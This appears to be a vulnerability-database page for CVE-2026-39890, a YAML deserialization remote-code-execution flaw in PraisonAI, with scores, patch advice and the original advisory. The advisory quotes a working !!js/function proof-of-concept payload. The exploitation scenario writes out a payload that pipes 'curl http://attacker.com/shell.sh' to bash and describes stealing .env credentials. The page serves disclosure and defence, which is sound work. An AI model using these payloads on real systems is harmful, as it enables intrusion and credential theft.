CVE-2026-39890: PraisonAI: YAML deserialization enables unauthenticated RCE

GHSA-32vr-5gcf-3pw2 CRITICAL PoC AVAILABLE CISA: ATTEND
Published April 8, 2026
CISO Take

PraisonAI's agent-loading service uses js-yaml's unsafe `load()` function without a safe schema, allowing any attacker to embed executable JavaScript via `!!js/function` tags in a crafted agent definition YAML file — resulting in unauthenticated remote code execution at CVSS 9.8. Any deployment exposing the agent upload endpoint without authentication is fully compromisable on first attempt: the published proof-of-concept requires no AI expertise and is trivially adaptable. AI agent processes routinely hold API keys, database credentials, and broad filesystem access, making server compromise here disproportionately impactful compared to a typical web application RCE. Upgrade immediately to praisonai >= 4.5.115, which patches the issue by switching to `yaml.load()` with `JSON_SCHEMA`; as an interim control, restrict or WAF-block the agent definition upload endpoint until patching is complete.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Critical. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) means fully network-exploitable with zero authentication and zero user interaction. A working PoC is documented in the public security advisory — exploitation is script-kiddie level. The 9 other CVEs recorded against this package indicate a pattern of security debt. AI agent runtimes typically operate with elevated process privileges and broad tool access, amplifying the blast radius well beyond a conventional web server compromise.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI pip <= 4.5.114 4.5.115
1 dependents 82% patched ~0d to patch Full package profile →

Do you use PraisonAI? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 44% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps
  1. Patch immediately: upgrade to praisonai >= 4.5.115 — this is the only complete fix.

  2. If patching is delayed, block the agent definition upload endpoint at the network or WAF layer, or enforce authentication on all agent management APIs.

  3. Audit all YAML parsing in your codebase: search for yaml.load( calls in js-yaml usage lacking { schema: JSON_SCHEMA } or { schema: DEFAULT_SAFE_SCHEMA }.

  4. Scan deployed agent definition files for the presence of !!js/ tags as an indicator of compromise.

  5. Rotate all credentials accessible to the PraisonAI process (API keys, DB passwords, tokens) if exploitation is suspected or confirmed.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI System Input Controls
NIST AI RMF
MANAGE 2.4 - Residual risks and response actions are monitored and managed
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-39890?

PraisonAI's agent-loading service uses js-yaml's unsafe `load()` function without a safe schema, allowing any attacker to embed executable JavaScript via `!!js/function` tags in a crafted agent definition YAML file — resulting in unauthenticated remote code execution at CVSS 9.8. Any deployment exposing the agent upload endpoint without authentication is fully compromisable on first attempt: the published proof-of-concept requires no AI expertise and is trivially adaptable. AI agent processes routinely hold API keys, database credentials, and broad filesystem access, making server compromise here disproportionately impactful compared to a typical web application RCE. Upgrade immediately to praisonai >= 4.5.115, which patches the issue by switching to `yaml.load()` with `JSON_SCHEMA`; as an interim control, restrict or WAF-block the agent definition upload endpoint until patching is complete.

Is CVE-2026-39890 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-39890, increasing the risk of exploitation.

How to fix CVE-2026-39890?

1. Patch immediately: upgrade to praisonai >= 4.5.115 — this is the only complete fix. 2. If patching is delayed, block the agent definition upload endpoint at the network or WAF layer, or enforce authentication on all agent management APIs. 3. Audit all YAML parsing in your codebase: search for `yaml.load(` calls in js-yaml usage lacking `{ schema: JSON_SCHEMA }` or `{ schema: DEFAULT_SAFE_SCHEMA }`. 4. Scan deployed agent definition files for the presence of `!!js/` tags as an indicator of compromise. 5. Rotate all credentials accessible to the PraisonAI process (API keys, DB passwords, tokens) if exploitation is suspected or confirmed.

What systems are affected by CVE-2026-39890?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, multi-agent orchestration, AI development pipelines, model serving.

What is the CVSS score for CVE-2026-39890?

CVE-2026-39890 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.58%.

What is the AI security impact?

Affected AI Architectures

agent frameworksmulti-agent orchestrationAI development pipelinesmodel serving

MITRE ATLAS Techniques

AML.T0011.000 Unsafe AI Artifacts
AML.T0049 Exploit Public-Facing Application
AML.T0072 Reverse Shell
AML.T0081 Modify AI Agent Configuration
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.6
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM07

What are the technical details?

Original Advisory

## Summary The `AgentService.loadAgentFromFile` method uses the `js-yaml` library to parse YAML files without disabling dangerous tags (such as `!!js/function` and `!!js/undefined`). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. ## Details The vulnerability exists in the YAML deserialization process. The `js-yaml` library's `load` function is used without specifying a safe schema (e.g., `JSON_SCHEMA` or `DEFAULT_SAFE_SCHEMA`). This enables the parsing of JavaScript functions and other dangerous types. When a malicious YAML file containing a `!!js/function` tag is parsed, the function is evaluated, leading to arbitrary code execution. The vulnerable code is located in `src/agents/agent.service.ts` at line 55. ## PoC An attacker can create a malicious agent YAML file with the following content: ```yaml !!js/function > function(){ require('child_process').execSync('touch /tmp/pwned') } ``` Then, upload this file as an agent definition via the API endpoint that uses `AgentService.loadAgentFromFile`. When the agent is loaded (either during startup or via an API call that triggers loading), the payload will execute the command `touch /tmp/pwned`, demonstrating arbitrary code execution. ## Impact This vulnerability allows an unauthenticated attacker (if the API endpoint is unprotected) or an authenticated attacker with the ability to upload agent definitions to execute arbitrary code on the server. This can lead to complete compromise of the server, data theft, or further network penetration. ## Recommended Fix Replace the unsafe `load` method with a safe alternative. Specifically, use the `load` method with a safe schema, such as `JSON_SCHEMA` or `DEFAULT_SAFE_SCHEMA`. For example: ```typescript import yaml from 'js-yaml'; import { JSON_SCHEMA } from 'js-yaml'; // In the loadAgentFromFile method const agent = yaml.load(fileContent, { schema: JSON_SCHEMA }); ``` Alternatively, if the application requires only a subset of YAML features, consider using the `safeLoad` method from an older version (though note it was deprecated). The key is to avoid loading tags that can execute code. Additionally, validate and sanitize all user input, especially file uploads. Ensure that agent definition files are only uploaded by trusted users and consider storing them in a secure location with proper access controls.

Exploitation Scenario

An attacker discovers a PraisonAI instance with an unauthenticated agent definition upload endpoint — trivially detectable via Shodan or passive DNS. They craft a YAML payload containing `!!js/function > function(){ require('child_process').execSync('curl http://attacker.com/shell.sh | bash') }` and POST it to the agent upload API. PraisonAI's `loadAgentFromFile` passes this to js-yaml's unsafe `load()`, which evaluates the embedded JavaScript in the Node.js process. The reverse shell callback gives the attacker full server access: they exfiltrate `.env` files containing LLM API keys, database credentials, and access tokens, then pivot laterally into connected enterprise infrastructure using the agent's configured tool access.

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 8, 2026
Last Modified
April 9, 2026
First Seen
April 8, 2026

Related Vulnerabilities